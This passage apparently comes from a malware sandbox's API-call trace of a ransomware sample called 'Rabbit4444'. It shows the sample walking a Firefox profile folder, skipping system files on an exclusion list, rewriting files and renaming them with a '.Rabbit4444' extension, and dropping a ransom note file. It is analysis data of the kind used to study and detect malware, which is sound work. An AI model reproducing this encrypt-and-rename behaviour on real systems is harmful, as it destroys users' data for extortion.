lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="Rabbit4444.exe") returned -1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="windows") returned -1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="bootmgr") returned 1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="pagefile.sys") returned -1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="boot") returned 1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="ids.txt") returned 1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="NTUSER.DAT") returned -1 [0051.910] lstrcpyW (in: lpString1=0x130ebf0, lpString2="moz-safe-about+home" | out: lpString1="moz-safe-about+home") returned="moz-safe-about+home" [0051.910] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x117380 [0051.910] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe0) returned 0x10c928 [0051.910] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x117388 | out: ListHead=0xf68b0, ListEntry=0x117388) returned 0xea710 [0051.910] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41de8bd2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea4c3c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41ea601c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 0 [0051.910] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0051.910] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.910] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0051.912] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0051.912] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0051.912] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.912] CloseHandle (hObject=0x278) returned 1 [0051.912] CloseHandle (hObject=0x27c) returned 1 [0051.912] GetCurrentThreadId () returned 0xd98 [0051.912] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x117388 [0051.912] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home" [0051.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117380 | out: hHeap=0xe0000) returned 1 [0051.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home" [0051.913] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\" [0051.913] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.BFC0E91B00AE8A0620D3" [0051.913] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0051.918] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0051.920] FlushFileBuffers (hFile=0x27c) returned 1 [0051.922] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.922] CloseHandle (hObject=0x27c) returned 1 [0051.922] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home") returned 111 [0051.922] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.922] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41de8bd2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea601c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe844128a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0051.922] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.922] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.922] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0051.923] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.923] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41de8bd2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea601c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe844128a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.923] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.923] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.923] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0051.923] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.923] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.923] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe844128a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe844128a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe844128a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.923] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.923] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.923] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41de9f5b, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41de9f5b, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41de9f5b, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="Rabbit4444.exe") returned -1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2=".") returned 1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="..") returned 1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="windows") returned -1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="bootmgr") returned -1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="pagefile.sys") returned -1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="boot") returned -1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="ids.txt") returned -1 [0051.923] lstrcmpiW (lpString1=".metadata", lpString2="NTUSER.DAT") returned -1 [0051.923] lstrcpyW (in: lpString1=0x130ec18, lpString2=".metadata" | out: lpString1=".metadata") returned=".metadata" [0051.923] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata", dwFileAttributes=0x0) returned 1 [0051.924] lstrlenW (lpString=".metadata") returned 9 [0051.924] lstrlenW (lpString="Rabbit4444") returned 10 [0051.924] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0051.924] lstrlenW (lpString=".dll") returned 4 [0051.924] lstrcmpiW (lpString1="data", lpString2=".dll") returned 1 [0051.924] lstrlenW (lpString=".lnk") returned 4 [0051.924] lstrcmpiW (lpString1="data", lpString2=".lnk") returned 1 [0051.924] lstrlenW (lpString=".ini") returned 4 [0051.924] lstrcmpiW (lpString1="data", lpString2=".ini") returned 1 [0051.924] lstrlenW (lpString=".sys") returned 4 [0051.924] lstrcmpiW (lpString1="data", lpString2=".sys") returned 1 [0051.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.924] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.924] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14323517848) returned 1 [0051.924] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=46) returned 1 [0051.925] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0051.925] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0051.925] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x298 [0051.926] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x70000 [0051.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0051.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0051.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0051.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0051.927] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14323796795) returned 1 [0051.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0051.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0051.927] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.928] CloseHandle (hObject=0x298) returned 1 [0051.928] CloseHandle (hObject=0x278) returned 1 [0051.928] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata.Rabbit4444") returned 132 [0051.928] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata.rabbit4444"), dwFlags=0x1) returned 1 [0051.928] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e667ed, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41e667ed, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41e667ed, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".metadata-v2", cAlternateFileName="METADA~2")) returned 1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="Rabbit4444.exe") returned -1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2=".") returned 1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="..") returned 1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="windows") returned -1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="bootmgr") returned -1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="pagefile.sys") returned -1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="boot") returned -1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="ids.txt") returned -1 [0051.928] lstrcmpiW (lpString1=".metadata-v2", lpString2="NTUSER.DAT") returned -1 [0051.928] lstrcpyW (in: lpString1=0x130ec18, lpString2=".metadata-v2" | out: lpString1=".metadata-v2") returned=".metadata-v2" [0051.929] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2", dwFileAttributes=0x0) returned 1 [0051.929] lstrlenW (lpString=".metadata-v2") returned 12 [0051.929] lstrlenW (lpString="Rabbit4444") returned 10 [0051.929] lstrcmpiW (lpString1="etadata-v2", lpString2="Rabbit4444") returned -1 [0051.929] lstrlenW (lpString=".dll") returned 4 [0051.929] lstrcmpiW (lpString1="a-v2", lpString2=".dll") returned 1 [0051.929] lstrlenW (lpString=".lnk") returned 4 [0051.929] lstrcmpiW (lpString1="a-v2", lpString2=".lnk") returned 1 [0051.929] lstrlenW (lpString=".ini") returned 4 [0051.929] lstrcmpiW (lpString1="a-v2", lpString2=".ini") returned 1 [0051.929] lstrlenW (lpString=".sys") returned 4 [0051.929] lstrcmpiW (lpString1="a-v2", lpString2=".sys") returned 1 [0051.929] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.929] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.929] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14324024565) returned 1 [0051.930] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=59) returned 1 [0051.930] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0051.930] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0051.930] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x340, lpName=0x0) returned 0x298 [0051.931] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x340) returned 0x70000 [0051.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0051.932] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0051.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.932] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0051.932] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.932] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0051.932] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14324297260) returned 1 [0051.932] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0051.932] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0051.932] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.932] CloseHandle (hObject=0x298) returned 1 [0051.932] CloseHandle (hObject=0x278) returned 1 [0051.933] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.Rabbit4444") returned 135 [0051.933] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.rabbit4444"), dwFlags=0x1) returned 1 [0051.933] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ea601c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x826703d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xf722f14, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.933] lstrcmpiW (lpString1="idb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="Rabbit4444.exe") returned -1 [0051.933] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="windows") returned -1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="bootmgr") returned 1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="pagefile.sys") returned -1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="boot") returned 1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="ids.txt") returned -1 [0051.933] lstrcmpiW (lpString1="idb", lpString2="NTUSER.DAT") returned -1 [0051.933] lstrcpyW (in: lpString1=0x130ec18, lpString2="idb" | out: lpString1="idb") returned="idb" [0051.933] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x117100 [0051.933] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe8) returned 0x10c928 [0051.934] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x117108 | out: ListHead=0xf68b0, ListEntry=0x117108) returned 0xea710 [0051.934] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ea601c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x826703d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xf722f14, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 0 [0051.934] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0051.934] lstrcpyW (in: lpString1=0x130ec18, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.934] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0051.934] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0051.934] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0051.934] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.935] CloseHandle (hObject=0x278) returned 1 [0051.935] CloseHandle (hObject=0x27c) returned 1 [0051.935] GetCurrentThreadId () returned 0xd98 [0051.935] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x117108 [0051.935] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb" [0051.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117100 | out: hHeap=0xe0000) returned 1 [0051.935] lstrcatW (in: lpString1="", 